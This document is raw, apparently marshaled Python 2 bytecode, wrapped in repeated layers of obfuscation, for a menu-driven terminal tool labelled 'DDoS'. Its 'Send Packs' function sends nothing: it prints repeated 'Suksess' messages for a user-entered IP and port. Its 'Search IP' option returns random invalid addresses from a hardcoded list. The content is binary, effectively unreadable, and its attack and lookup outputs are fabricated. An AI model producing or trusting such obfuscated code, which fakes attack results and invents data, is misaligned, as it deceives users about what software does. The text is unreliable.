\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsn\x1f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd7\x1e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs@\x1e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa9\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x12\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs{\x1c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01
\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe4\x1b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsM\x1b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb6\x1a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1f\x1a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x88\x19\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf1\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsZ\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc3\x17\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs,\x17\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\
x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x95\x16\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfe\x15\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsg\x15\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd0\x14\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs9\x14\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa2\x13\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x97\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00e\x00\x00j\x04\x00d\x02\x00\x83\x01\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00d\x04\x00\x84\x00\x00Z\x06\x00d\x05\x00\x84\x00\x00Z\x07\x00d\x06\x00\x84\x00\x00Z\x08\x00d\x07\x00\x84\x00\x00Z\t\x00d\x08\x00\x84\x00\x00Z\n\x00d\t\x00\x84\x00\x00Z\x0b\x00d\n\x00\x84\x00\x00Z\x0c\x00e\x0c\x00\x83\x00\x00\x01e\t\x00\x83\x00\x00\x01d\x01\x00S(\x0b\x00\x00\x00i\xff\xff\xff\xffNt\x05\x00\x00\x00clearc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x13\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x17\x00\x00\x
00\x1b[91m[\x1b[97mkeluar\x1b[91m](\x02\x00\x00\x00t\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>R\x02\x00\x00\x00\x07\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\t\x00\x00\x00d\x01\x00GHd\x00\x00S(\x02\x00\x00\x00Ns]\x04\x00\x00\x1b[1m\n\x1b[91m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x84\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x8c \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x90 \xe2\x96\x88\xe2\x96\x88 Fuck \xe2\x96\x88\xe2\x96\x88\n\x1b[93m\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x90 \xe2\x96\x88\xe2\x96\x88 DDoS \xe2\x96\x88\xe2\x96\x88\n\x1b[92m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x8c \xe2\x96\x88\xe2\x96\x88 :) 
\xe2\x96\x88\xe2\x96\x88\n\xe2\x96\x80\xe2\x9d\x8d\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x9d\x8d\xe2\x9d\x8d\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x9d\x8d\xe2\x9d\x8d\xe2\x96\x80 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1m\x1b[91m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\x1b[91m\xe2\x95\x91\x1b[93m* \x1b[92mName \x1b[94m: \x1b[97mErlang \x1b[91m\xe2\x95\x91\n\x1b[91m\xe2\x95\x91\x1b[93m* \x1b[92mGithub \x1b[94m: \x1b[97mhttps://github.com/3RL4N9 \x1b[91m\xe2\x95\x91\n\x1b[91m\xe2\x95\x91\x1b[93m* \x1b[92mFacebook\x1b[94m: \x1b[97mhttps://fb.me/erlang.sans \x1b[91m\xe2\x95\x91\n\x1b[91m\xe2\x95\x91\x1b[93m* \x1b[92mGender \x1b[94m: \x1b[97mCwk:v 
\x1b[91m\xe2\x95\x91\n\x1b[91m\xe2\x95\xa0\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa3(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x04\x00\x00\x00logo\n\x00\x00\x00s\x02\x00\x00\x00\x00\x0cc\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s"\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x00\x00S(\x04\x00\x00\x00NR\x00\x00\x00\x00s3\x00\x00\x00\x1b[97m\xe2\x95\xa0\x1b[91m[\x1b[97mAmunisi\x1b[91m]\x1b[91m[\x1b[97m80\x1b[91m]s\x83\x00\x00\x00\x1b[97m\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa3(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00systemR\x03\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x03\x00\x00\x00war\x17\x00\x00\x00s\x08\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s{\x00\x00\x00t\x00\x00\x83\x00\x00\x01t\x01\x00d\x01\x00\x83\x01\x00}\x00\x00d\x02\x00GHt\x01\x00d\x03\x00\x83\x01\x00}\x01\x00|\x01\x00d\x04\x00k\x02\x00r:\x00t\x02\x00\x83\x00\x00\
x01n\x00\x00x:\x00t\x03\x00d\x05\x00\x83\x01\x00D],\x00}\x02\x00t\x04\x00j\x05\x00d\x06\x00\x83\x01\x00\x01d\x07\x00|\x00\x00d\x08\x00|\x01\x00d\t\x00f\x05\x00GHd\n\x00GHqG\x00Wd\x00\x00S(\x0b\x00\x00\x00Ns,\x00\x00\x00\x1b[97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\x1b[91m[\x1b[97mIP\x1b[91m]\x1b[97ms\x14\x00\x00\x00\x1b[97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9ds4\x00\x00\x00\x1b[97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mPORT\x1b[91m]\x1b[97mt\x00\x00\x00\x00iQ\x00\x00\x00g\x9a\x99\x99\x99\x99\x99\xb9?s\x17\x00\x00\x00\x1b[31mSend Packs To\x1b[97ms\x0b\x00\x00\x00\x1b[91m=\x1b[97ms\x0b\x00\x00\x00\x1b[91mSuksess\n\x00\x00\x00\x1b[32m[\xe2\x88\x9a](\x06\x00\x00\x00R\x06\x00\x00\x00t\x05\x00\x00\x00inputR\x02\x00\x00\x00t\x05\x00\x00\x00ranget\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x03\x00\x00\x00t\x02\x00\x00\x00ipt\x02\x00\x00\x00jmt\x01\x00\x00\x00_(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x01\x00\x00\x00q\x1c\x00\x00\x00s\x14\x00\x00\x00\x00\x01\x07\x01\x0c\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x13\x01\r\x01\x14\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xb5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r:\x00d\x03\x00GHt\x01\x00j\x02\x00d\x04\x00\x83\x01\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01nw\x00|\x00\x00d\x06\x00k\x02\x00rP\x00t\x05\x00\x83\x00\x00\x01na\x00|\x00\x00d\x07\x00k\x02\x00rf\x00t\x06\x00\x83\x00\x00\x01nK\x00|\x00\x00d\x08\x00k\x02\x00r|\x00t\x07\x00\x83\x00\x00\x01n5\x00|\x00\x00d\t\x00k\x02\x00r\x92\x00t\x08\x00\x83\x00\x00\x01n\x1f\x00d\n\x00GHt\x01\x00j\x02\x00d\x04\x00\x83\x01\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01d\x00\x00S(\x0b\x00\x00\x00Ns*\x00\x00\x00\x1b[92m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mCHOICE\x1b[91m]\x1b[97mR\x07\x00\x00\x00s\'\x00\x00\x00\x1b[91m[\x1b[97m!\x1b[91m]\x1b[97mDi Isi Sayang 
:)i\x02\x00\x00\x00s\x0e\x00\x00\x00python ddos.pyt\x01\x00\x00\x001t\x01\x00\x00\x002t\x01\x00\x00\x003t\x01\x00\x00\x000s&\x00\x00\x00\x1b[91m[\x1b[97m!\x1b[91m]\x1b[97mSalah Sayang :)(\t\x00\x00\x00R\x08\x00\x00\x00R\n\x00\x00\x00R\x0b\x00\x00\x00R\x04\x00\x00\x00R\x05\x00\x00\x00R\x0f\x00\x00\x00t\x01\x00\x00\x00rt\x01\x00\x00\x00iR\x02\x00\x00\x00(\x01\x00\x00\x00t\x01\x00\x00\x00g(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>R\x16\x00\x00\x00\'\x00\x00\x00s \x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\r\x01\x10\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x85\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x02\x00d\x03\x00d\x04\x00d\x05\x00g\x04\x00\x83\x01\x00}\x00\x00d\x06\x00GHt\x05\x00d\x07\x00\x83\x01\x00}\x01\x00|\x01\x00d\x08\x00k\x02\x00rV\x00t\x06\x00\x83\x00\x00\x01n\x00\x00d\t\x00|\x01\x00d\n\x00|\x00\x00d\x0b\x00f\x05\x00GHt\x05\x00d\x0c\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\r\x00\x83\x01\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR\x00\x00\x00\x00s\x0e\x00\x00\x00134.35.087.123s\x0e\x00\x00\x00145.752.678.45s\r\x00\x00\x00125.87.907.45s\x0f\x00\x00\x00136.694.076.345sK\x00\x00\x00\x1b[97m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mEXAMPLE\x1b[91m]\x1b[97=\x1b[91m[\x1b[97mwww.example.com\x1b[91m]s\'\x00\x00\x00\x1b[97m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mURL\x1b[91m]\x1b[97mR\x07\x00\x00\x00s!\x00\x00\x00\x1b[97m\xe2\x95\xa0\x1b[91m[\x1b[97m\xe2\x80\xa2\x1b[91m]\x1b[97ms\x0b\x00\x00\x00\x1b[91m=\x1b[97ms\x14\x00\x00\x00\x1b[91m[\x1b[97m\xe2\x80\xa2\x1b[91m]s(\x00\x00\x00\x1b[97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mBACK\x1b[91m]\x1b[97ms\x0e\x00\x00\x00python 
ddos.py(\x07\x00\x00\x00R\x04\x00\x00\x00R\x05\x00\x00\x00R\x03\x00\x00\x00t\x06\x00\x00\x00randomt\x06\x00\x00\x00choiceR\x08\x00\x00\x00R\x02\x00\x00\x00(\x02\x00\x00\x00t\x02\x00\x00\x00IPt\x02\x00\x00\x00Cr(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>R\x14\x00\x00\x009\x00\x00\x00s\x14\x00\x00\x00\x00\x01\r\x01\x07\x01\x1b\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x14\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s4\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHt\x03\x00d\x03\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01d\x00\x00S(\x05\x00\x00\x00NR\x00\x00\x00\x00s\xd7\x01\x00\x00\n\x1b[94m\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa3\n\x1b[94m\xe2\x95\x91\x1b[93mNote \x1b[96m: \x1b[97mThanks to Allah\t \t \x1b[94m \t \xe2\x95\x91\n\x1b[94m\xe2\x95\x91\x1b[93mNote \x1b[96m: \x1b[97mIf Error You can Call me in FB\t \x1b[94m\xe2\x95\x91\n\x1b[94m\xe2\x95\x91\x1b[93mNote \x1b[96m: \x1b[97mThanks For Using My Tool :) 
\x1b[94m\xe2\x95\x91\n\x1b[94m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9ds(\x00\x00\x00\x1b[94m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mBACK\x1b[91m]\x1b[97ms\x0e\x00\x00\x00python ddos.py(\x04\x00\x00\x00R\x04\x00\x00\x00R\x05\x00\x00\x00R\x03\x00\x00\x00R\x08\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>R\x15\x00\x00\x00D\x00\x00\x00s\n\x00\x00\x00\x00\x01\r\x01\x07\x06\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x10\x00\x00\x00t\x00\x00\x83\x00\x00\x01d\x01\x00GHd\x00\x00S(\x02\x00\x00\x00Ns\xe6\x01\x00\x00\n\x1b[92m\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa3\n\x1b[92m\xe2\x95\x91\x1b[93m1\x1b[96m. \x1b[95m: \x1b[97mSend Packs \t\t\t \x1b[92m\xe2\x95\x91\n\x1b[92m\xe2\x95\x91\x1b[93m2\x1b[96m. \x1b[95m: \x1b[97mSearch IP\t\t\t\t \x1b[92m\xe2\x95\x91\n\x1b[92m\xe2\x95\x91\x1b[93m3\x1b[96m. \x1b[95m: \x1b[97mInformation\t\t\t \x1b[92m\xe2\x95\x91\n\x1b[92m\xe2\x95\x91\x1b[93m0\x1b[96m. 
\x1b[95m: \x1b[97mExit \t\t\t\t \x1b[92m\xe2\x95\x91\n\x1b[92m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d(\x01\x00\x00\x00R\x03\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x0